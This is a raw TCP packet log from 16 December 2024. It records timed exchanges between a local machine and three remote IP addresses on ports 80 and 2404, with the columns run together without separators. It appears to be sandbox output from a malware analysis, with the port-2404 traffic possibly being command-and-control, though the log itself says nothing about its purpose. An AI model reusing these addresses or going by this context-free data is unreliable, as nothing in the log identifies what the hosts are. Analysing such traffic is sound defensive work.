                                                                                                                        Dec 16, 2024 16:18:46.493916988 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.494060040 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.494105101 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.494775057 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.494823933 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.494920969 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.494970083 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.495769024 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.495819092 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.495958090 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.496002913 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.496959925 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.497004986 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.497302055 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.497348070 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.497819901 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.497867107 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.498014927 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.498059034 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.498496056 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.498539925 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.498544931 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.498590946 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.499392033 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.499439001 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.499480963 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.499526024 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.500468969 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.500516891 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.500554085 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.500597954 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.501312971 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.501362085 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.501431942 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.501476049 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.502332926 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.502381086 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.502435923 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.502482891 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.503340960 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.503391027 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.503458977 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.503500938 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.504606009 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.504654884 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.504661083 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.504698992 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.505354881 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.505400896 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:49.295031071 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:49.414947987 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:49.415128946 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:49.423393011 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:49.543168068 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:50.561512947 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:50.616214037 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:50.795356989 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:50.805406094 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:50.925367117 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:50.928304911 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.048293114 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.274636030 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.276494980 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.396594048 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.466414928 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.470525980 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.522317886 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.590413094 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.594341993 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.598397970 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:51.718369961 CET4973980192.168.2.4178.237.33.50
                                                                                                                        Dec 16, 2024 16:18:51.718653917 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.839449883 CET8049739178.237.33.50192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:51.839705944 CET4973980192.168.2.4178.237.33.50
                                                                                                                        Dec 16, 2024 16:18:51.839926004 CET4973980192.168.2.4178.237.33.50
                                                                                                                        Dec 16, 2024 16:18:51.959991932 CET8049739178.237.33.50192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:52.758114100 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:52.803572893 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:52.995383978 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.026638031 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.084805012 CET8049739178.237.33.50192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.084850073 CET4973980192.168.2.4178.237.33.50
                                                                                                                        Dec 16, 2024 16:18:53.146512985 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.146612883 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.267390966 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.356754065 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.476598024 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503262997 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503289938 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503303051 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503390074 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.503464937 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503478050 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.503520012 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.541577101 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.541599989 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.541610003 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.541698933 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.541759968 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.543101072 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.543248892 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.543303967 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.551805973 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.551820040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.551884890 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.623369932 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.662966013 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.695419073 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.695554972 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.695635080 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.699625969 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.699686050 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.699742079 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.708313942 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.708422899 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.708488941 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.717298985 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.717322111 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.717385054 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.725701094 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.725791931 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.725857019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.733218908 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.733274937 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.733333111 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.741185904 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.741322041 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.741393089 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.749454975 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.749548912 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.749608994 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.758044958 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.758107901 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.758168936 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.766748905 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.766817093 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.766874075 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.775533915 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.775559902 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.775648117 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.784018040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.784188032 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.784255028 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.792851925 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.834810019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.887181044 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.887212038 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.887356043 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.890743971 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.890836954 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.890896082 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.897917986 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.897958040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.898034096 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.905045986 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.905139923 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.905208111 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.912611008 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.912796021 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.912852049 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.919184923 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.919230938 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.919291019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.923775911 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.923861980 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.923919916 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.928488970 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.928602934 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.928654909 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.933141947 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.933235884 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.933299065 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.937825918 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.937956095 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.938010931 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.942663908 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.942679882 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.942738056 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.947602987 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.947660923 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.947722912 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.951926947 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.952017069 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.952078104 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.956545115 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.956619978 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.956692934 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.961253881 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.961429119 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.961483002 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.965991974 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.966134071 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.966186047 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.970757008 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.970875025 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.970931053 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.975358963 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.975460052 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.975522995 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.980077982 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.980092049 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.980158091 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.984749079 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.984885931 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.984951019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.989422083 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.989559889 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.989623070 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.994111061 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.994137049 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.994190931 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.998760939 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.998903990 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.998959064 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.007168055 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.007193089 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.007252932 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.078986883 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.079004049 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.079097033 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.080202103 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.080311060 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.080357075 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.083820105 CET8049739178.237.33.50192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.083870888 CET4973980192.168.2.4178.237.33.50
                                                                                                                        Dec 16, 2024 16:18:54.084234953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.084357977 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.084408045 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.088479042 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.088572979 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.088632107 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.092613935 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.092694044 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.092744112 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.096597910 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.096697092 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.096749067 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.100418091 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.100486994 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.100538969 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.104212999 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.104258060 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.104312897 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.107702971 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.107800961 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.107850075 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.111130953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.111264944 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.111341953 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.114533901 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.114612103 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.114661932 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.117799997 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.117935896 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.117990971 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.117995977 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.119925976 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.119972944 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.120021105 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.123105049 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.123152971 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.123202085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.126519918 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.126573086 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.126583099 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.129425049 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.129476070 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.129529953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.132575035 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.132632017 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.132659912 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.135679007 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.135727882 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.135730982 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.137515068 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.137563944 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.137590885 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.139364958 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.139415979 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.139452934 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.141133070 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.141174078 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.141252041 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.142976999 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.143028975 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.143076897 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.144839048 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.144891977 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.144921064 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.146708965 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.146759987 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.146807909 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.148489952 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.148511887 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.148540974 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.150496006 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.150543928 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.150614023 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.152184010 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.152235985 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.152275085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.153992891 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.154045105 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.154046059 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.155772924 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.155822039 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.155869961 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.157763958 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.157793045 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.157819986 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.159528017 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.159578085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.159585953 CET497382404192.168.2.4162.251.122.87
